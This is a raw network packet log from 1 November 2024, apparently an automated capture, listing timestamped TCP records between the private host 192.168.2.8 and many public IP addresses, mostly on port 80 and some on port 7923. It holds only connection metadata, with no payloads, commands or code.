                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.850611925 CET805022244.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:53.508836985 CET805022244.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:53.509020090 CET5022280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:53.515161037 CET805022244.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:53.515218019 CET5022280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:53.524401903 CET5022380192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:53.529644966 CET805022318.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:53.529706001 CET5022380192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:53.529824972 CET5022380192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:53.529880047 CET5022380192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:53.534748077 CET805022318.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:53.535166979 CET805022318.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:53.937074900 CET805022118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:53.940648079 CET5022180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:53.945944071 CET805022118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:53.946024895 CET5022180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:53.953694105 CET5022480192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:53.958513021 CET805022454.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:53.958636045 CET5022480192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:53.958756924 CET5022480192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:53.958828926 CET5022480192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:53.963500977 CET805022454.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:53.963634968 CET805022454.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:54.793904066 CET805022454.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:54.794058084 CET5022480192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:54.799371958 CET805022454.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:54.799415112 CET5022480192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:54.809701920 CET5022580192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:54.815244913 CET805022544.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:54.815300941 CET5022580192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:54.815440893 CET5022580192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:54.815457106 CET5022580192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:54.820280075 CET805022544.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:54.820290089 CET805022544.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:54.956310034 CET805022318.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:54.956492901 CET5022380192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:54.961656094 CET805022318.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:54.961704016 CET5022380192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:54.972181082 CET5022680192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:54.977056980 CET805022618.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:54.977113962 CET5022680192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:54.977267981 CET5022680192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:54.977283955 CET5022680192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:54.982124090 CET805022618.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:54.982134104 CET805022618.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.205708981 CET5022680192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.209146976 CET5022780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.213980913 CET805022718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.214049101 CET5022780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.214174032 CET5022780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.214211941 CET5022780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.218961954 CET805022718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.218981981 CET805022718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.503612995 CET805022544.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.503745079 CET5022580192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.509094000 CET805022544.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.509141922 CET5022580192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.520452976 CET5022880192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.525270939 CET8050228172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.525361061 CET5022880192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.525516033 CET5022880192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.525516033 CET5022880192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.530344009 CET8050228172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.530354023 CET8050228172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.533955097 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.538836956 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.549509048 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.554415941 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.804685116 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.806710958 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.811568975 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.883740902 CET805022718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.884341955 CET5022780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.889637947 CET805022718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.891767979 CET5022780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.904619932 CET5022980192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.909413099 CET805022944.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.910264969 CET5022980192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.910356045 CET5022980192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.910356045 CET5022980192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.915122986 CET805022944.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.915132999 CET805022944.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.955395937 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.961030960 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:55.965986967 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.190718889 CET8050228172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.193912029 CET5022880192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.193912029 CET5022880192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.197971106 CET5023080192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.198930025 CET8050228172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.202785969 CET8050230172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.205861092 CET5023080192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.205861092 CET5023080192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.205895901 CET5023080192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.211020947 CET8050230172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.211039066 CET8050230172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.604687929 CET805022944.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.607835054 CET5022980192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.613276958 CET805022944.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.613358021 CET5022980192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.621648073 CET5023180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.626646996 CET805023113.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.626770020 CET5023180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.626863956 CET5023180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.626863956 CET5023180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.631618977 CET805023113.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.631642103 CET805023113.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.867052078 CET8050230172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.867177963 CET5023080192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.867177963 CET5023080192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.872051001 CET8050230172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.894057989 CET5023280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.898998022 CET805023218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.899708986 CET5023280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.960627079 CET5023280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:56.960664988 CET5023280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:57.210889101 CET805023218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:57.210939884 CET805023218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.073182106 CET805023113.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.073462009 CET5023180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.079067945 CET805023113.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.079184055 CET5023180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.091389894 CET5023380192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.096282005 CET805023335.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.096525908 CET5023380192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.096613884 CET5023380192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.096613884 CET5023380192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.101542950 CET805023335.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.101556063 CET805023335.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.319653988 CET805023218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.319989920 CET5023280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.325948000 CET805023218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.326137066 CET5023280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.351718903 CET5023480192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.357088089 CET805023482.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.357491016 CET5023480192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.357491016 CET5023480192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.357491016 CET5023480192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.362505913 CET805023482.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:58.362890005 CET805023482.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:59.205761909 CET5023380192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:59.209698915 CET5023580192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:59.596035004 CET805023335.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:59.596086979 CET5023380192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:59.596133947 CET805023335.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:59.596177101 CET5023380192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:59.596193075 CET805023335.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:59.596273899 CET5023380192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:59.596476078 CET805023335.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:59.596518993 CET5023380192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:59.834845066 CET805023335.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:59.834912062 CET805023535.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:59.835024118 CET5023380192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:59.835024118 CET5023580192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:59.835199118 CET5023580192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:59.835248947 CET5023580192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:59.839968920 CET805023535.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:59.840157032 CET805023535.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:01.160572052 CET805023535.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:01.160639048 CET805023535.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:01.160648108 CET805023535.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:01.160677910 CET5023580192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:01.160708904 CET5023580192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:01.160775900 CET805023535.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:01.160816908 CET5023580192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:01.160881042 CET5023580192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:01.166408062 CET805023535.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:01.178195000 CET5023680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:01.183046103 CET805023618.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:01.183096886 CET5023680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:01.183325052 CET5023680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:01.183373928 CET5023680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:01.188153028 CET805023618.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:01.188173056 CET805023618.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:02.646171093 CET805023618.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:02.647864103 CET5023680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:02.652978897 CET805023618.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:02.655858040 CET5023680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:02.667701006 CET5023780192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:02.672528028 CET805023718.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:02.675863028 CET5023780192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:02.675952911 CET5023780192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:02.675952911 CET5023780192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:02.680836916 CET805023718.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:02.680847883 CET805023718.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:03.205612898 CET5023780192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:03.209111929 CET5023880192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:03.214032888 CET805023818.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:03.214092970 CET5023880192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:03.214251995 CET5023880192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:03.214283943 CET5023880192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:03.219203949 CET805023818.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:03.219284058 CET805023818.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.047048092 CET805023818.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.057394981 CET5023880192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.074748039 CET805023818.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.074781895 CET5023980192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.074928045 CET5023880192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.079616070 CET805023934.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.079957008 CET5023980192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.080272913 CET5023980192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.080272913 CET5023980192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.085094929 CET805023934.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.085114956 CET805023934.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.921349049 CET805023934.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.921639919 CET5023980192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.927386045 CET805023934.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.927442074 CET5023980192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.938157082 CET5024080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.943190098 CET805024018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.943259001 CET5024080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.943387985 CET5024080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.943401098 CET5024080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.948203087 CET805024018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:04.948214054 CET805024018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:05.617506981 CET805024018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:05.618220091 CET5024080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:05.624087095 CET805024018.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:05.624164104 CET5024080192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:05.640558004 CET5024180192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:05.645433903 CET805024135.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:05.645528078 CET5024180192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:05.645647049 CET5024180192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:05.645690918 CET5024180192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:05.650576115 CET805024135.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:05.650588989 CET805024135.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:06.506182909 CET805024135.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:06.511250973 CET5024180192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:06.516494036 CET805024135.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:06.516575098 CET5024180192.168.2.835.164.78.200
